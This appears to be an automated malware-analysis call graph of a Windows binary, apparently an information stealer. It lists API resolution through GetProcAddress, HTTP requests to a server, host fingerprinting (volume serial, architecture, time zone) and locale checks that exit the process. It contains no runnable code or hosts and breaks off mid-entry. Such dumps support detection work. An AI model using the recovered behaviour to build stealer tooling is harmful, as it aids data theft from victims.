14281->14282 14283 86371c 14282->14283 14284 8645c0 2 API calls 14283->14284 14285 863735 14284->14285 14286 8645c0 2 API calls 14285->14286 14287 86374e 14286->14287 14288 8645c0 2 API calls 14287->14288 14289 863767 14288->14289 14290 8645c0 2 API calls 14289->14290 14291 863780 14290->14291 14292 8645c0 2 API calls 14291->14292 14293 863799 14292->14293 14294 8645c0 2 API calls 14293->14294 14295 8637b2 14294->14295 14296 8645c0 2 API calls 14295->14296 14297 8637cb 14296->14297 14298 8645c0 2 API calls 14297->14298 14299 8637e4 14298->14299 14300 8645c0 2 API calls 14299->14300 14301 8637fd 14300->14301 14302 8645c0 2 API calls 14301->14302 14303 863816 14302->14303 14304 8645c0 2 API calls 14303->14304 14305 86382f 14304->14305 14306 8645c0 2 API calls 14305->14306 14307 863848 14306->14307 14308 8645c0 2 API calls 14307->14308 14309 863861 14308->14309 14310 8645c0 2 API calls 14309->14310 14311 86387a 14310->14311 14312 8645c0 2 API calls 14311->14312 14313 863893 14312->14313 14314 8645c0 2 API calls 14313->14314 14315 8638ac 14314->14315 14316 8645c0 2 API calls 14315->14316 14317 8638c5 14316->14317 14318 8645c0 2 API calls 14317->14318 14319 8638de 14318->14319 14320 8645c0 2 API calls 14319->14320 14321 8638f7 14320->14321 14322 8645c0 2 API calls 14321->14322 14323 863910 14322->14323 14324 8645c0 2 API calls 14323->14324 14325 863929 14324->14325 14326 8645c0 2 API calls 14325->14326 14327 863942 14326->14327 14328 8645c0 2 API calls 14327->14328 14329 86395b 14328->14329 14330 8645c0 2 API calls 14329->14330 14331 863974 14330->14331 14332 8645c0 2 API calls 14331->14332 14333 86398d 14332->14333 14334 8645c0 2 API calls 14333->14334 14335 8639a6 14334->14335 14336 8645c0 2 API calls 14335->14336 14337 8639bf 14336->14337 14338 8645c0 2 API calls 14337->14338 14339 8639d8 14338->14339 14340 8645c0 2 API calls 14339->14340 14341 8639f1 14340->14341 14342 8645c0 2 API calls 14341->14342 14343 863a0a 14342->14343 14344 8645c0 2 API calls 14343->14344 14345 863a23 14344->14345 14346 8645c0 2 API calls 14345->14346 14347 863a3c 14346->14347 14348 8645c0 2 API calls 14347->14348 14349 863a55 14348->14349 14350 8645c0 2 API calls 14349->14350 14351 863a6e 14350->14351 14352 8645c0 2 API calls 14351->14352 14353 863a87 14352->14353 14354 8645c0 2 API calls 14353->14354 14355 863aa0 14354->14355 14356 8645c0 2 API calls 14355->14356 14357 863ab9 14356->14357 14358 8645c0 2 API calls 14357->14358 14359 863ad2 14358->14359 14360 8645c0 2 API calls 14359->14360 14361 863aeb 14360->14361 14362 8645c0 2 API calls 14361->14362 14363 863b04 14362->14363 14364 8645c0 2 API calls 14363->14364 14365 863b1d 14364->14365 14366 8645c0 2 API calls 14365->14366 14367 863b36 14366->14367 14368 8645c0 2 API calls 14367->14368 14369 863b4f 14368->14369 14370 8645c0 2 API calls 14369->14370 14371 863b68 14370->14371 14372 8645c0 2 API calls 14371->14372 14373 863b81 14372->14373 14374 8645c0 2 API calls 14373->14374 14375 863b9a 14374->14375 14376 8645c0 2 API calls 14375->14376 14377 863bb3 14376->14377 14378 8645c0 2 API calls 14377->14378 14379 863bcc 14378->14379 14380 8645c0 2 API calls 14379->14380 14381 863be5 14380->14381 14382 8645c0 2 API calls 14381->14382 14383 863bfe 14382->14383 14384 8645c0 2 API calls 14383->14384 14385 863c17 14384->14385 14386 8645c0 2 API calls 14385->14386 14387 863c30 14386->14387 14388 8645c0 2 API calls 14387->14388 14389 863c49 14388->14389 14390 8645c0 2 API calls 14389->14390 14391 863c62 14390->14391 14392 8645c0 2 API calls 14391->14392 14393 863c7b 14392->14393 14394 8645c0 2 API calls 14393->14394 14395 863c94 14394->14395 14396 8645c0 2 API calls 14395->14396 14397 863cad 14396->14397 14398 8645c0 2 API calls 14397->14398 14399 863cc6 14398->14399 14400 8645c0 2 API calls 14399->14400 14401 863cdf 14400->14401 14402 8645c0 2 API calls 14401->14402 14403 863cf8 14402->14403 14404 8645c0 2 API calls 14403->14404 14405 863d11 14404->14405 14406 8645c0 2 API calls 14405->14406 14407 863d2a 14406->14407 14408 8645c0 2 API calls 14407->14408 14409 863d43 14408->14409 14410 8645c0 2 API calls 14409->14410 14411 863d5c 14410->14411 14412 8645c0 2 API calls 14411->14412 14413 863d75 14412->14413 14414 8645c0 2 API calls 14413->14414 14415 863d8e 14414->14415 14416 8645c0 2 API calls 14415->14416 14417 863da7 14416->14417 14418 8645c0 2 API calls 14417->14418 14419 863dc0 14418->14419 14420 8645c0 2 API calls 14419->14420 14421 863dd9 14420->14421 14422 8645c0 2 API calls 14421->14422 14423 863df2 14422->14423 14424 8645c0 2 API calls 14423->14424 14425 863e0b 14424->14425 14426 8645c0 2 API calls 14425->14426 14427 863e24 14426->14427 14428 8645c0 2 API calls 14427->14428 14429 863e3d 14428->14429 14430 8645c0 2 API calls 14429->14430 14431 863e56 14430->14431 14432 8645c0 2 API calls 14431->14432 14433 863e6f 14432->14433 14434 8645c0 2 API calls 14433->14434 14435 863e88 14434->14435 14436 8645c0 2 API calls 14435->14436 14437 863ea1 14436->14437 14438 8645c0 2 API calls 14437->14438 14439 863eba 14438->14439 14440 8645c0 2 API calls 14439->14440 14441 863ed3 14440->14441 14442 8645c0 2 API calls 14441->14442 14443 863eec 14442->14443 14444 8645c0 2 API calls 14443->14444 14445 863f05 14444->14445 14446 8645c0 2 API calls 14445->14446 14447 863f1e 14446->14447 14448 8645c0 2 API calls 14447->14448 14449 863f37 14448->14449 14450 8645c0 2 API calls 14449->14450 14451 863f50 14450->14451 14452 8645c0 2 API calls 14451->14452 14453 863f69 14452->14453 14454 8645c0 2 API calls 14453->14454 14455 863f82 14454->14455 14456 8645c0 2 API calls 14455->14456 14457 863f9b 14456->14457 14458 8645c0 2 API calls 14457->14458 14459 863fb4 14458->14459 14460 8645c0 2 API calls 14459->14460 14461 863fcd 14460->14461 14462 8645c0 2 API calls 14461->14462 14463 863fe6 14462->14463 14464 8645c0 2 API calls 14463->14464 14465 863fff 14464->14465 14466 8645c0 2 API calls 14465->14466 14467 864018 14466->14467 14468 8645c0 2 API calls 14467->14468 14469 864031 14468->14469 14470 8645c0 2 API calls 14469->14470 14471 86404a 14470->14471 14472 8645c0 2 API calls 14471->14472 14473 864063 14472->14473 14474 8645c0 2 API calls 14473->14474 14475 86407c 14474->14475 14476 8645c0 2 API calls 14475->14476 14477 864095 14476->14477 14478 8645c0 2 API calls 14477->14478 14479 8640ae 14478->14479 14480 8645c0 2 API calls 14479->14480 14481 8640c7 14480->14481 14482 8645c0 2 API calls 14481->14482 14483 8640e0 14482->14483 14484 8645c0 2 API calls 14483->14484 14485 8640f9 14484->14485 14486 8645c0 2 API calls 14485->14486 14487 864112 14486->14487 14488 8645c0 2 API calls 14487->14488 14489 86412b 14488->14489 14490 8645c0 2 API calls 14489->14490 14491 864144 14490->14491 14492 8645c0 2 API calls 14491->14492 14493 86415d 14492->14493 14494 8645c0 2 API calls 14493->14494 14495 864176 14494->14495 14496 8645c0 2 API calls 14495->14496 14497 86418f 14496->14497 14498 8645c0 2 API calls 14497->14498 14499 8641a8 14498->14499 14500 8645c0 2 API calls 14499->14500 14501 8641c1 14500->14501 14502 8645c0 2 API calls 14501->14502 14503 8641da 14502->14503 14504 8645c0 2 API calls 14503->14504 14505 8641f3 14504->14505 14506 8645c0 2 API calls 14505->14506 14507 86420c 14506->14507 14508 8645c0 2 API calls 14507->14508 14509 864225 14508->14509 14510 8645c0 2 API calls 14509->14510 14511 86423e 14510->14511 14512 8645c0 2 API calls 14511->14512 14513 864257 14512->14513 14514 8645c0 2 API calls 14513->14514 14515 864270 14514->14515 14516 8645c0 2 API calls 14515->14516 14517 864289 14516->14517 14518 8645c0 2 API calls 14517->14518 14519 8642a2 14518->14519 14520 8645c0 2 API calls 14519->14520 14521 8642bb 14520->14521 14522 8645c0 2 API calls 14521->14522 14523 8642d4 14522->14523 14524 8645c0 2 API calls 14523->14524 14525 8642ed 14524->14525 14526 8645c0 2 API calls 14525->14526 14527 864306 14526->14527 14528 8645c0 2 API calls 14527->14528 14529 86431f 14528->14529 14530 8645c0 2 API calls 14529->14530 14531 864338 14530->14531 14532 8645c0 2 API calls 14531->14532 14533 864351 14532->14533 14534 8645c0 2 API calls 14533->14534 14535 86436a 14534->14535 14536 8645c0 2 API calls 14535->14536 14537 864383 14536->14537 14538 8645c0 2 API calls 14537->14538 14539 86439c 14538->14539 14540 8645c0 2 API calls 14539->14540 14541 8643b5 14540->14541 14542 8645c0 2 API calls 14541->14542 14543 8643ce 14542->14543 14544 8645c0 2 API calls 14543->14544 14545 8643e7 14544->14545 14546 8645c0 2 API calls 14545->14546 14547 864400 14546->14547 14548 8645c0 2 API calls 14547->14548 14549 864419 14548->14549 14550 8645c0 2 API calls 14549->14550 14551 864432 14550->14551 14552 8645c0 2 API calls 14551->14552 14553 86444b 14552->14553 14554 8645c0 2 API calls 14553->14554 14555 864464 14554->14555 14556 8645c0 2 API calls 14555->14556 14557 86447d 14556->14557 14558 8645c0 2 API calls 14557->14558 14559 864496 14558->14559 14560 8645c0 2 API calls 14559->14560 14561 8644af 14560->14561 14562 8645c0 2 API calls 14561->14562 14563 8644c8 14562->14563 14564 8645c0 2 API calls 14563->14564 14565 8644e1 14564->14565 14566 8645c0 2 API calls 14565->14566 14567 8644fa 14566->14567 14568 8645c0 2 API calls 14567->14568 14569 864513 14568->14569 14570 8645c0 2 API calls 14569->14570 14571 86452c 14570->14571 14572 8645c0 2 API calls 14571->14572 14573 864545 14572->14573 14574 8645c0 2 API calls 14573->14574 14575 86455e 14574->14575 14576 8645c0 2 API calls 14575->14576 14577 864577 14576->14577 14578 8645c0 2 API calls 14577->14578 14579 864590 14578->14579 14580 8645c0 2 API calls 14579->14580 14581 8645a9 14580->14581 14582 879c10 14581->14582 14583 87a036 8 API calls 14582->14583 14584 879c20 43 API calls 14582->14584 14585 87a146 14583->14585 14586 87a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14583->14586 14584->14583 14587 87a216 14585->14587 14588 87a153 8 API calls 14585->14588 14586->14585 14589 87a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14587->14589 14590 87a298 14587->14590 14588->14587 14589->14590 14591 87a337 14590->14591 14592 87a2a5 6 API calls 14590->14592 14593 87a344 9 API calls 14591->14593 14594 87a41f 14591->14594 14592->14591 14593->14594 14595 87a4a2 14594->14595 14596 87a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14594->14596 14597 87a4dc 14595->14597 14598 87a4ab GetProcAddress GetProcAddress 14595->14598 14596->14595 14599 87a515 14597->14599 14600 87a4e5 GetProcAddress GetProcAddress 14597->14600 14598->14597 14601 87a612 14599->14601 14602 87a522 10 API calls 14599->14602 14600->14599 14603 87a67d 14601->14603 14604 87a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14601->14604 14602->14601 14605 87a686 GetProcAddress 14603->14605 14606 87a69e 14603->14606 14604->14603 14605->14606 14607 87a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14606->14607 14608 875ca3 14606->14608 14607->14608 14609 861590 14608->14609 15728 861670 14609->15728 14612 87a7a0 lstrcpy 14613 8615b5 14612->14613 14614 87a7a0 lstrcpy 14613->14614 14615 8615c7 14614->14615 14616 87a7a0 lstrcpy 14615->14616 14617 8615d9 14616->14617 14618 87a7a0 lstrcpy 14617->14618 14619 861663 14618->14619 14620 875510 14619->14620 14621 875521 14620->14621 14622 87a820 2 API calls 14621->14622 14623 87552e 14622->14623 14624 87a820 2 API calls 14623->14624 14625 87553b 14624->14625 14626 87a820 2 API calls 14625->14626 14627 875548 14626->14627 14628 87a740 lstrcpy 14627->14628 14629 875555 14628->14629 14630 87a740 lstrcpy 14629->14630 14631 875562 14630->14631 14632 87a740 lstrcpy 14631->14632 14633 87556f 14632->14633 14634 87a740 lstrcpy 14633->14634 14672 87557c 14634->14672 14635 8752c0 25 API calls 14635->14672 14636 875643 StrCmpCA 14636->14672 14637 8756a0 StrCmpCA 14638 8757dc 14637->14638 14637->14672 14639 87a8a0 lstrcpy 14638->14639 14640 8757e8 14639->14640 14641 87a820 2 API calls 14640->14641 14643 8757f6 14641->14643 14642 87a820 lstrlen lstrcpy 14642->14672 14645 87a820 2 API calls 14643->14645 14644 875856 StrCmpCA 14646 875991 14644->14646 14644->14672 14651 875805 14645->14651 14650 87a8a0 lstrcpy 14646->14650 14647 87a740 lstrcpy 14647->14672 14648 87a7a0 lstrcpy 14648->14672 14649 87a8a0 lstrcpy 14649->14672 14652 87599d 14650->14652 14653 861670 lstrcpy 14651->14653 14655 87a820 2 API calls 14652->14655 14671 875811 14653->14671 14654 861590 lstrcpy 14654->14672 14656 8759ab 14655->14656 14658 87a820 2 API calls 14656->14658 14657 875a0b StrCmpCA 14659 875a16 Sleep 14657->14659 14660 875a28 14657->14660 14661 8759ba 14658->14661 14659->14672 14662 87a8a0 lstrcpy 14660->14662 14663 861670 lstrcpy 14661->14663 14664 875a34 14662->14664 14663->14671 14665 87a820 2 API calls 14664->14665 14666 875a43 14665->14666 14667 87a820 2 API calls 14666->14667 14668 875a52 14667->14668 14670 861670 lstrcpy 14668->14670 14669 87578a StrCmpCA 14669->14672 14670->14671 14671->13727 14672->14635 14672->14636 14672->14637 14672->14642 14672->14644 14672->14647 14672->14648 14672->14649 14672->14654 14672->14657 14672->14669 14673 87593f StrCmpCA 14672->14673 14674 8751f0 20 API calls 14672->14674 14673->14672 14674->14672 14676 877553 GetVolumeInformationA 14675->14676 14677 87754c 14675->14677 14678 877591 14676->14678 14677->14676 14679 8775fc GetProcessHeap RtlAllocateHeap 14678->14679 14680 877619 14679->14680 14681 877628 wsprintfA 14679->14681 14682 87a740 lstrcpy 14680->14682 14683 87a740 lstrcpy 14681->14683 14684 875da7 14682->14684 14683->14684 14684->13748 14686 87a7a0 lstrcpy 14685->14686 14687 864899 14686->14687 15737 8647b0 14687->15737 14689 8648a5 14690 87a740 lstrcpy 14689->14690 14691 8648d7 14690->14691 14692 87a740 lstrcpy 14691->14692 14693 8648e4 14692->14693 14694 87a740 lstrcpy 14693->14694 14695 8648f1 14694->14695 14696 87a740 lstrcpy 14695->14696 14697 8648fe 14696->14697 14698 87a740 lstrcpy 14697->14698 14699 86490b InternetOpenA StrCmpCA 14698->14699 14700 864944 14699->14700 14701 864ecb InternetCloseHandle 14700->14701 15743 878b60 14700->15743 14703 864ee8 14701->14703 15758 869ac0 CryptStringToBinaryA 14703->15758 14704 864963 15751 87a920 14704->15751 14707 864976 14709 87a8a0 lstrcpy 14707->14709 14714 86497f 14709->14714 14710 87a820 2 API calls 14711 864f05 14710->14711 14713 87a9b0 4 API calls 14711->14713 14712 864f27 codecvt 14716 87a7a0 lstrcpy 14712->14716 14715 864f1b 14713->14715 14718 87a9b0 4 API calls 14714->14718 14717 87a8a0 lstrcpy 14715->14717 14729 864f57 14716->14729 14717->14712 14719 8649a9 14718->14719 14720 87a8a0 lstrcpy 14719->14720 14721 8649b2 14720->14721 14722 87a9b0 4 API calls 14721->14722 14723 8649d1 14722->14723 14724 87a8a0 lstrcpy 14723->14724 14725 8649da 14724->14725 14726 87a920 3 API calls 14725->14726 14727 8649f8 14726->14727 14728 87a8a0 lstrcpy 14727->14728 14730 864a01 14728->14730 14729->13751 14731 87a9b0 4 API calls 14730->14731 14732 864a20 14731->14732 14733 87a8a0 lstrcpy 14732->14733 14734 864a29 14733->14734 14735 87a9b0 4 API calls 14734->14735 14736 864a48 14735->14736 14737 87a8a0 lstrcpy 14736->14737 14738 864a51 14737->14738 14739 87a9b0 4 API calls 14738->14739 14740 864a7d 14739->14740 14741 87a920 3 API calls 14740->14741 14742 864a84 14741->14742 14743 87a8a0 lstrcpy 14742->14743 14744 864a8d 14743->14744 14745 864aa3 InternetConnectA 14744->14745 14745->14701 14746 864ad3 HttpOpenRequestA 14745->14746 14748 864ebe InternetCloseHandle 14746->14748 14749 864b28 14746->14749 14748->14701 14750 87a9b0 4 API calls 14749->14750 14751 864b3c 14750->14751 14752 87a8a0 lstrcpy 14751->14752 14753 864b45 14752->14753 14754 87a920 3 API calls 14753->14754 14755 864b63 14754->14755 14756 87a8a0 lstrcpy 14755->14756 14757 864b6c 14756->14757 14758 87a9b0 4 API calls 14757->14758 14759 864b8b 14758->14759 14760 87a8a0 lstrcpy 14759->14760 14761 864b94 14760->14761 14762 87a9b0 4 API calls 14761->14762 14763 864bb5 14762->14763 14764 87a8a0 lstrcpy 14763->14764 14765 864bbe 14764->14765 14766 87a9b0 4 API calls 14765->14766 14767 864bde 14766->14767 14768 87a8a0 lstrcpy 14767->14768 14769 864be7 14768->14769 14770 87a9b0 4 API calls 14769->14770 14771 864c06 14770->14771 14772 87a8a0 lstrcpy 14771->14772 14773 864c0f 14772->14773 14774 87a920 3 API calls 14773->14774 14775 864c2d 14774->14775 14776 87a8a0 lstrcpy 14775->14776 14777 864c36 14776->14777 14778 87a9b0 4 API calls 14777->14778 14779 864c55 14778->14779 14780 87a8a0 lstrcpy 14779->14780 14781 864c5e 14780->14781 14782 87a9b0 4 API calls 14781->14782 14783 864c7d 14782->14783 14784 87a8a0 lstrcpy 14783->14784 14785 864c86 14784->14785 14786 87a920 3 API calls 14785->14786 14787 864ca4 14786->14787 14788 87a8a0 lstrcpy 14787->14788 14789 864cad 14788->14789 14790 87a9b0 4 API calls 14789->14790 14791 864ccc 14790->14791 14792 87a8a0 lstrcpy 14791->14792 14793 864cd5 14792->14793 14794 87a9b0 4 API calls 14793->14794 14795 864cf6 14794->14795 14796 87a8a0 lstrcpy 14795->14796 14797 864cff 14796->14797 14798 87a9b0 4 API calls 14797->14798 14799 864d1f 14798->14799 14800 87a8a0 lstrcpy 14799->14800 14801 864d28 14800->14801 14802 87a9b0 4 API calls 14801->14802 14803 864d47 14802->14803 14804 87a8a0 lstrcpy 14803->14804 14805 864d50 14804->14805 14806 87a920 3 API calls 14805->14806 14807 864d6e 14806->14807 14808 87a8a0 lstrcpy 14807->14808 14809 864d77 14808->14809 14810 87a740 lstrcpy 14809->14810 14811 864d92 14810->14811 14812 87a920 3 API calls 14811->14812 14813 864db3 14812->14813 14814 87a920 3 API calls 14813->14814 14815 864dba 14814->14815 14816 87a8a0 lstrcpy 14815->14816 14817 864dc6 14816->14817 14818 864de7 lstrlen 14817->14818 14819 864dfa 14818->14819 14820 864e03 lstrlen 14819->14820 15757 87aad0 14820->15757 14822 864e13 HttpSendRequestA 14823 864e32 InternetReadFile 14822->14823 14824 864e67 InternetCloseHandle 14823->14824 14829 864e5e 14823->14829 14826 87a800 14824->14826 14826->14748 14827 87a9b0 4 API calls 14827->14829 14828 87a8a0 lstrcpy 14828->14829 14829->14823 14829->14824 14829->14827 14829->14828 15764 87aad0 14830->15764 14832 8717c4 StrCmpCA 14833 8717d7 14832->14833 14834 8717cf ExitProcess 14832->14834 14835 8719c2 14833->14835 14836 8718cf StrCmpCA 14833->14836 14837 8718ad StrCmpCA 14833->14837 14838 871913 StrCmpCA 14833->14838 14839 871932 StrCmpCA 14833->14839 14840 8718f1 StrCmpCA 14833->14840 14841 871951 StrCmpCA 14833->14841 14842 871970 StrCmpCA 14833->14842 14843 87187f StrCmpCA 14833->14843 14844 87185d StrCmpCA 14833->14844 14845 87a820 lstrlen lstrcpy 14833->14845 14835->13753 14836->14833 14837->14833 14838->14833 14839->14833 14840->14833 14841->14833 14842->14833 14843->14833 14844->14833 14845->14833 14847 87a7a0 lstrcpy 14846->14847 14848 865979 14847->14848 14849 8647b0 2 API calls 14848->14849 14850 865985 14849->14850 14851 87a740 lstrcpy 14850->14851 14852 8659ba 14851->14852 14853 87a740 lstrcpy 14852->14853 14854 8659c7 14853->14854 14855 87a740 lstrcpy 14854->14855 14856 8659d4 14855->14856 14857 87a740 lstrcpy 14856->14857 14858 8659e1 14857->14858 14859 87a740 lstrcpy 14858->14859 14860 8659ee InternetOpenA StrCmpCA 14859->14860 14861 865a1d 14860->14861 14862 865fc3 InternetCloseHandle 14861->14862 14864 878b60 3 API calls 14861->14864 14863 865fe0 14862->14863 14866 869ac0 4 API calls 14863->14866 14865 865a3c 14864->14865 14867 87a920 3 API calls 14865->14867 14868 865fe6 14866->14868 14869 865a4f 14867->14869 14871 87a820 2 API calls 14868->14871 14874 86601f codecvt 14868->14874 14870 87a8a0 lstrcpy 14869->14870 14875 865a58 14870->14875 14872 865ffd 14871->14872 14873 87a9b0 4 API calls 14872->14873 14876 866013 14873->14876 14877 87a7a0 lstrcpy 14874->14877 14879 87a9b0 4 API calls 14875->14879 14878 87a8a0 lstrcpy 14876->14878 14888 86604f 14877->14888 14878->14874 14880 865a82 14879->14880 14881 87a8a0 lstrcpy 14880->14881 14882 865a8b 14881->14882 14883 87a9b0 4 API calls 14882->14883 14884 865aaa 14883->14884 14885 87a8a0 lstrcpy 14884->14885 14886 865ab3 14885->14886 14887 87a920 3 API calls 14886->14887 14889 865ad1 14887->14889 14888->13759 14890 87a8a0 lstrcpy 14889->14890 14891 865ada 14890->14891 14892 87a9b0 4 API calls 14891->14892 14893 865af9 14892->14893 14894 87a8a0 lstrcpy 14893->14894 14895 865b02 14894->14895 14896 87a9b0 4 API calls 14895->14896 14897 865b21 14896->14897 14898 87a8a0 lstrcpy 14897->14898 14899 865b2a 14898->14899 14900 87a9b0 4 API calls 14899->14900 14901 865b56 14900->14901 14902 87a920 3 API calls 14901->14902 14903 865b5d 14902->14903 14904 87a8a0 lstrcpy 14903->14904 14905 865b66 14904->14905 14906 865b7c InternetConnectA 14905->14906 14906->14862 14907 865bac HttpOpenRequestA 14906->14907 14909 865fb6 InternetCloseHandle 14907->14909 14910 865c0b 14907->14910 14909->14862 14911 87a9b0 4 API calls 14910->14911 14912 865c1f 14911->14912 14913 87a8a0 lstrcpy 14912->14913 14914 865c28 14913->14914 14915 87a920 3 API calls 14914->14915 14916 865c46 14915->14916 14917 87a8a0 lstrcpy 14916->14917 14918 865c4f 14917->14918 14919 87a9b0 4 API calls 14918->14919 14920 865c6e 14919->14920 14921 87a8a0 lstrcpy 14920->14921 14922 865c77 14921->14922 14923 87a9b0 4 API calls 14922->14923 14924 865c98 14923->14924 14925 87a8a0 lstrcpy 14924->14925 14926 865ca1 14925->14926 14927 87a9b0 4 API calls 14926->14927 14928 865cc1 14927->14928 14929 87a8a0 lstrcpy 14928->14929 14930 865cca 14929->14930 14931 87a9b0 4 API calls 14930->14931 14932 865ce9 14931->14932 14933 87a8a0 lstrcpy 14932->14933 14934 865cf2 14933->14934 14935 87a920 3 API calls 14934->14935 14936 865d10 14935->14936 14937 87a8a0 lstrcpy 14936->14937 14938 865d19 14937->14938 14939 87a9b0 4 API calls 14938->14939 14940 865d38 14939->14940 14941 87a8a0 lstrcpy 14940->14941 14942 865d41 14941->14942 14943 87a9b0 4 API calls 14942->14943 14944 865d60 14943->14944 14945 87a8a0 lstrcpy 14944->14945 14946 865d69 14945->14946 14947 87a920 3 API calls 14946->14947 14948 865d87 14947->14948 14949 87a8a0 lstrcpy 14948->14949 14950 865d90 14949->14950 14951 87a9b0 4 API calls 14950->14951 14952 865daf 14951->14952 14953 87a8a0 lstrcpy 14952->14953 14954 865db8 14953->14954 14955 87a9b0 4 API calls 14954->14955 14956 865dd9 14955->14956 14957 87a8a0 lstrcpy 14956->14957 14958 865de2 14957->14958 14959 87a9b0 4 API calls 14958->14959 14960 865e02 14959->14960 14961 87a8a0 lstrcpy 14960->14961 14962 865e0b 14961->14962 14963 87a9b0 4 API calls 14962->14963 14964 865e2a 14963->14964 14965 87a8a0 lstrcpy 14964->14965 14966 865e33 14965->14966 14967 87a920 3 API calls 14966->14967 14968 865e54 14967->14968 14969 87a8a0 lstrcpy 14968->14969 14970 865e5d 14969->14970 14971 865e70 lstrlen 14970->14971 15765 87aad0 14971->15765 14973 865e81 lstrlen GetProcessHeap RtlAllocateHeap 15766 87aad0 14973->15766 14975 865eae lstrlen 14976 865ebe 14975->14976 14977 865ed7 lstrlen 14976->14977 14978 865ee7 14977->14978 14979 865ef0 lstrlen 14978->14979 14980 865f04 14979->14980 14981 865f1a lstrlen 14980->14981 15767 87aad0 14981->15767 14983 865f2a HttpSendRequestA 14984 865f35 InternetReadFile 14983->14984 14985 865f6a InternetCloseHandle 14984->14985 14989 865f61 14984->14989 14985->14909 14987 87a9b0 4 API calls 14987->14989 14988 87a8a0 lstrcpy 14988->14989 14989->14984 14989->14985 14989->14987 14989->14988 14992 871077 14990->14992 14991 871151 14991->13761 14992->14991 14993 87a820 lstrlen lstrcpy 14992->14993 14993->14992 14999 870db7 14994->14999 14995 870f17 14995->13769 14996 870e27 StrCmpCA 14996->14999 14997 870e67 StrCmpCA 14997->14999 14998 870ea4 StrCmpCA 14998->14999 14999->14995 14999->14996 14999->14997 14999->14998 15000 87a820 lstrlen lstrcpy 14999->15000 15000->14999 15004 870f67 15001->15004 15002 871044 15002->13777 15003 870fb2 StrCmpCA 15003->15004 15004->15002 15004->15003 15005 87a820 lstrlen lstrcpy 15004->15005 15005->15004 15007 87a740 lstrcpy 15006->15007 15008 871a26 15007->15008 15009 87a9b0 4 API calls 15008->15009 15010 871a37 15009->15010 15011 87a8a0 lstrcpy 15010->15011 15012 871a40 15011->15012 15013 87a9b0 4 API calls 15012->15013 15014 871a5b 15013->15014 15015 87a8a0 lstrcpy 15014->15015 15016 871a64 15015->15016 15017 87a9b0 4 API calls 15016->15017 15018 871a7d 15017->15018 15019 87a8a0 lstrcpy 15018->15019 15020 871a86 15019->15020 15021 87a9b0 4 API calls 15020->15021 15022 871aa1 15021->15022 15023 87a8a0 lstrcpy 15022->15023 15024 871aaa 15023->15024 15025 87a9b0 4 API calls 15024->15025 15026 871ac3 15025->15026 15027 87a8a0 lstrcpy 15026->15027 15028 871acc 15027->15028 15029 87a9b0 4 API calls 15028->15029 15030 871ae7 15029->15030 15031 87a8a0 lstrcpy 15030->15031 15032 871af0 15031->15032 15033 87a9b0 4 API calls 15032->15033 15034 871b09 15033->15034 15035 87a8a0 lstrcpy 15034->15035 15036 871b12 15035->15036 15037 87a9b0 4 API calls 15036->15037 15038 871b2d 15037->15038 15039 87a8a0 lstrcpy 15038->15039 15040 871b36 15039->15040 15041 87a9b0 4 API calls 15040->15041 15042 871b4f 15041->15042 15043 87a8a0 lstrcpy 15042->15043 15044 871b58 15043->15044 15045 87a9b0 4 API calls 15044->15045 15046 871b76 15045->15046 15047 87a8a0 lstrcpy 15046->15047 15048 871b7f 15047->15048 15049 877500 6 API calls 15048->15049 15050 871b96 15049->15050 15051 87a920 3 API calls 15050->15051 15052 871ba9 15051->15052 15053 87a8a0 lstrcpy 15052->15053 15054 871bb2 15053->15054 15055 87a9b0 4 API calls 15054->15055 15056 871bdc 15055->15056 15057 87a8a0 lstrcpy 15056->15057 15058 871be5 15057->15058 15059 87a9b0 4 API calls 15058->15059 15060 871c05 15059->15060 15061 87a8a0 lstrcpy 15060->15061 15062 871c0e 15061->15062 15768 877690 GetProcessHeap RtlAllocateHeap 15062->15768 15065 87a9b0 4 API calls 15066 871c2e 15065->15066 15067 87a8a0 lstrcpy 15066->15067 15068 871c37 15067->15068 15069 87a9b0 4 API calls 15068->15069 15070 871c56 15069->15070 15071 87a8a0 lstrcpy 15070->15071 15072 871c5f 15071->15072 15073 87a9b0 4 API calls 15072->15073 15074 871c80 15073->15074 15075 87a8a0 lstrcpy 15074->15075 15076 871c89 15075->15076 15775 8777c0 GetCurrentProcess IsWow64Process 15076->15775 15079 87a9b0 4 API calls 15080 871ca9 15079->15080 15081 87a8a0 lstrcpy 15080->15081 15082 871cb2 15081->15082 15083 87a9b0 4 API calls 15082->15083 15084 871cd1 15083->15084 15085 87a8a0 lstrcpy 15084->15085 15086 871cda 15085->15086 15087 87a9b0 4 API calls 15086->15087 15088 871cfb 15087->15088 15089 87a8a0 lstrcpy 15088->15089 15090 871d04 15089->15090 15091 877850 3 API calls 15090->15091 15092 871d14 15091->15092 15093 87a9b0 4 API calls 15092->15093 15094 871d24 15093->15094 15095 87a8a0 lstrcpy 15094->15095 15096 871d2d 15095->15096 15097 87a9b0 4 API calls 15096->15097 15098 871d4c 15097->15098 15099 87a8a0 lstrcpy 15098->15099 15100 871d55 15099->15100 15101 87a9b0 4 API calls 15100->15101 15102 871d75 15101->15102 15103 87a8a0 lstrcpy 15102->15103 15104 871d7e 15103->15104 15105 8778e0 3 API calls 15104->15105 15106 871d8e 15105->15106 15107 87a9b0 4 API calls 15106->15107 15108 871d9e 15107->15108 15109 87a8a0 lstrcpy 15108->15109 15110 871da7 15109->15110 15111 87a9b0 4 API calls 15110->15111 15112 871dc6 15111->15112 15113 87a8a0 lstrcpy 15112->15113 15114 871dcf 15113->15114 15115 87a9b0 4 API calls 15114->15115 15116 871df0 15115->15116 15117 87a8a0 lstrcpy 15116->15117 15118 871df9 15117->15118 15777 877980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15118->15777 15121 87a9b0 4 API calls 15122 871e19 15121->15122 15123 87a8a0 lstrcpy 15122->15123 15124 871e22 15123->15124 15125 87a9b0 4 API calls 15124->15125 15126 871e41 15125->15126 15127 87a8a0 lstrcpy 15126->15127 15128 871e4a 15127->15128 15129 87a9b0 4 API calls 15128->15129 15130 871e6b 15129->15130 15131 87a8a0 lstrcpy 15130->15131 15132 871e74 15131->15132 15779 877a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15132->15779 15135 87a9b0 4 API calls 15136 871e94 15135->15136 15137 87a8a0 lstrcpy 15136->15137 15138 871e9d 15137->15138 15139 87a9b0 4 API calls 15138->15139 15140 871ebc 15139->15140 15141 